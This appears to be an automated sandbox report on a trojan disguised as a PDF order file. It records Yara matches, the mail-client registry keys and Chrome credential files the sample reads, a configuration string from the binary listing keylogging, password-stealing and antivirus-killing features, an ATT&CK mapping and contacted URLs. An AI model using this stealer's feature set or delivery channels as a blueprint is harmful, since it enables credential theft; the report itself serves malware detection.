              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 18_2_00402D74
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 18_2_00402D74
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword 18_2_004033B1
              Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.9480345.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.8705bd5.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.7e95950.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000000.704117458.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000000.703279347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: vbc.exe PID: 6356, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
              Source: AppLaunch.exe, 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
              Source: AppLaunch.exe, 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
              MITRE ATT&CK matrix (tactic columns): Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts111
              Windows Management Instrumentation
              Path Interception412
              Process Injection
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts11
              Native API
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              2
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              Exfiltration Over Bluetooth1
              Remote Access Software
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Shared Modules
              Logon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              1
              Credentials In Files
              1
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)4
              Software Packing
              NTDS19
              System Information Discovery
              Distributed Component Object Model1
              Clipboard Data
              Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
              Virtualization/Sandbox Evasion
              LSA Secrets241
              Security Software Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common412
              Process Injection
              Cached Domain Credentials13
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Hidden Files and Directories
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Owner/User Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              Remote System Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Source | Detection | Scanner | Label
              ORDER-NEW....pdf.exe | 63% | Virustotal |
              ORDER-NEW....pdf.exe | 94% | ReversingLabs | ByteCode-MSIL.Trojan.Skeeyah
              ORDER-NEW....pdf.exe | 100% | Avira | HEUR/AGEN.1120322
              ORDER-NEW....pdf.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              Source | Detection | Scanner | Label
              5.0.AppLaunch.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
              5.0.AppLaunch.exe.400000.4.unpack | 100% | Avira | TR/Dropper.Gen
              0.0.ORDER-NEW....pdf.exe.7f0000.1.unpack | 100% | Avira | HEUR/AGEN.1120322
              5.0.AppLaunch.exe.400000.3.unpack | 100% | Avira | TR/Dropper.Gen
              8.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1210557
              0.2.ORDER-NEW....pdf.exe.7f0000.0.unpack | 100% | Avira | HEUR/AGEN.1120322
              8.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1210557
              8.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1210557
              5.2.AppLaunch.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
              0.0.ORDER-NEW....pdf.exe.7f0000.13.unpack | 100% | Avira | HEUR/AGEN.1120322
              8.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1210557
              8.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1210557
              8.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1210557
              0.0.ORDER-NEW....pdf.exe.7f0000.0.unpack | 100% | Avira | HEUR/AGEN.1120322
              5.0.AppLaunch.exe.400000.2.unpack | 100% | Avira | TR/Dropper.Gen
              5.0.AppLaunch.exe.400000.1.unpack | 100% | Avira | TR/Dropper.Gen
              8.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1210557
              No Antivirus matches
              Source | Detection | Scanner | Label
              https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
              https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | 0% | URL Reputation | safe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z | 0% | Avira URL Cloud | safe
              https://a.pomf.cat/ | 4% | Virustotal |
              https://a.pomf.cat/ | 100% | Avira URL Cloud | phishing
              https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js | 0% | Virustotal |
              https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js | 0% | Avira URL Cloud | safe
              http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation | safe
              https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588 | 0% | Avira URL Cloud | safe
              https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | 0% | URL Reputation | safe
              https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | 0% | URL Reputation | safe
              https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | 0% | URL Reputation | safe
              https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e | 0% | Avira URL Cloud | safe
              http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
              https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css | 0% | Avira URL Cloud | safe
              https://pki.goog/repository/0 | 0% | URL Reputation | safe
              https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1 | 0% | URL Reputation | safe
              https://172.217.23.78/ | 0% | Avira URL Cloud | safe
              https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js | 0% | URL Reputation | safe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6IjVhZWEwOTA0MmYxYzJjMDRlMmU1NDg1YzZmNjY2NTU5N2E5N | 0% | Avira URL Cloud | safe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z | 0% | Avira URL Cloud | safe
              http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
              http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | URL Reputation | safe
              http://pki.goog/gsr2/GTS1O1.crt0# | 0% | URL Reputation | safe
              http://pomf.cat/upload.php&https://a.pomf.cat/ | 0% | Avira URL Cloud | safe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxYWZjY2Q0NWJhMmI1MGJkMWJjMzhmMGFlZWM2MDJmMjc2O | 0% | Avira URL Cloud | safe
              No contacted domains info
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/css/main.v2.min.css | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ | vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg | bhvF129.tmp.8.dr | false | | high
              https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637 | bhvF129.tmp.8.dr | false | | high
              http://www.msn.com | bhvF129.tmp.8.dr | false | | high
              http://www.nirsoft.net | vbc.exe, 00000008.00000002.715560522.000000000019C000.00000004.00000001.sdmp | false | | high
              https://deff.nelreports.net/api/report?cat=msn | bhvF129.tmp.8.dr | false | URL Reputation: safe | unknown
              https://contextual.media.net/__media__/js/util/nrrV9140.js | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/images/chrome-logo.svg | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/images/homepage/homepage_features.png | bhvF129.tmp.8.dr | false | | high
              https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | bhvF129.tmp.8.dr | false | URL Reputation: safe | unknown
              https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png | bhvF129.tmp.8.dr | false | | high
              https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser= | bhvF129.tmp.8.dr | false | | high
              http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z | bhvF129.tmp.8.dr | false | Avira URL Cloud: safe | unknown
              https://a.pomf.cat/ | AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp | true | 4%, Virustotal; Avira URL Cloud: phishing | unknown
              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f | bhvF129.tmp.8.dr | false | | high
              https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js | bhvF129.tmp.8.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1 | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows | bhvF129.tmp.8.dr | false | | high
              https://maps.windows.com/windows-app-web-link | bhvF129.tmp.8.dr | false | | high
              http://www.msn.com/?ocid=iehp | vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712829130.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712034300.00000000022B6000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712693489.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.dr | false | | high
              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3 | bhvF129.tmp.8.dr | false | | high
              http://crl.pki.goog/GTS1O1core.crl0 | bhvF129.tmp.8.dr | false | URL Reputation: safe | unknown
